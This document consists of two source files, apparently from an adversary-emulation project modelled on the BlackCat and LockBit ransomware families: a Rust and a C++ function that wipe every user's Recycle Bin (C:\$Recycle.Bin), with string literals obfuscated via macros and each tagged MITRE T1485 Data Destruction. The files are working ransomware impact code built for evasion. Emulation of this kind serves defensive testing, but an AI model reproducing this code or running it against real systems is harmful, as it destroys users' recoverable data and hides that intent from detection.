File: managedservices/alphv_blackcat/resources/blackcat/src/recycling.rs
#![cfg(target_os = "windows")]

use std::fs;
use crate::logger::{log_error, log_info, log_debug};
use encryptliterals::esl;

/**
 * empty_recycling_bin
 *      About:
 *          Clears Recycle Bin as part of ransomware attack.
 *      Result:
 *          Cleared Recycle Bin of every user
 *      MITRE ATT&CK Techniques:
 *          T1485: Data Destruction
 *      CTI:
 *          https://www.varonis.com/blog/blackcat-ransomware
 */
pub fn empty_recycling_bin() {
    match fs::remove_dir_all(esl!("C:\\$Recycle.Bin")) {
        Ok(_) => log_info(String::from(esl!("Removed all files and directories from Recycle Bin"))),
        Err(e) => {
            log_error(format!("{} {:?}", esl!("Failed to delete recycle bin directory. Will attempt to clear individual subdirectories. Error message:") , e));
            match fs::read_dir(esl!("C:\\$Recycle.Bin")) {
                Ok(entries) => {
                    for entry in entries {
                        match entry {
                            Ok(entry) => {
                                let path = entry.path();
                                if path.is_dir() {
                                    match fs::remove_dir_all(path.clone()) {
                                        Ok(_) => log_debug(format!("{} {:?}", esl!("Deleted recycling bin subdirectory") , path.clone())),
                                        Err(e) => {
                                            log_error(format!("{} {:?}: {:?}", esl!("Failed to delete recycling bin subdirectory"), path.clone(), e));
                                        }
                                    }
                                } else {
                                    match fs::remove_file(path.clone()) {
                                        Ok(_) => log_debug(format!("{} {:?}", esl!("Deleted recycling bin item") , path.clone())),
                                        Err(e) => {
                                            log_error(format!("{} {:?}: {:?}", esl!("Failed to delete recycling bin item"), path.clone(), e));
                                        }
                                    }
                                }
                            },
                            Err(e) => {
                                log_error(format!("{} {:?}", esl!("Failed to access entry:"), e));
                            }
                        };
                    }
                },
                Err(e) => {
                    log_error(format!("{} {:?}", esl!("Failed to enumerate recycle bin subdirectories:") , e));
                }
            }
        }
    }
}

File: Enterprise/lockbit/Resources/Lockbit/src/common/impact/recycling.cpp
#include "crypto/xor_obfuscation.hpp"
#include "impact.hpp"
#include "logger.hpp"
#include <format>

namespace impact {

/*
 * ClearRecycleBin:
 *      About:
 *          Empties recycle bin (C:\$Recycle.Bin) using the C++ filesystem std library.
 *      Result:
 *          Empty recycle bin (C:\$Recycle.Bin)
 *      MITRE ATT&CK Techniques:
 *          T1485: Data Destruction
 *      CTI:
 *          https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
 */
bool ClearRecycleBin() {
    std::error_code error_code;
    std::uintmax_t num_removed = std::filesystem::remove_all(std::filesystem::path(XOR_LIT("C:\\$Recycle.Bin")), error_code);
    if (num_removed == static_cast<std::uintmax_t>(-1) || error_code.value() != 0) {
        XorLogger::LogError(std::format(
            "{}: {}. Error message: {}", 
            XOR_LIT("Failed to remove all files from Recycle Bin. Error code"),
            error_code.value(),
            error_code.message()
        ));
        return false;
    }
    XorLogger::LogDebug(std::format("{} {} {}", XOR_LIT("Successfully removed"), num_removed, XOR_LIT("files from Recycle Bin.")));
    return true;
}

} // namespace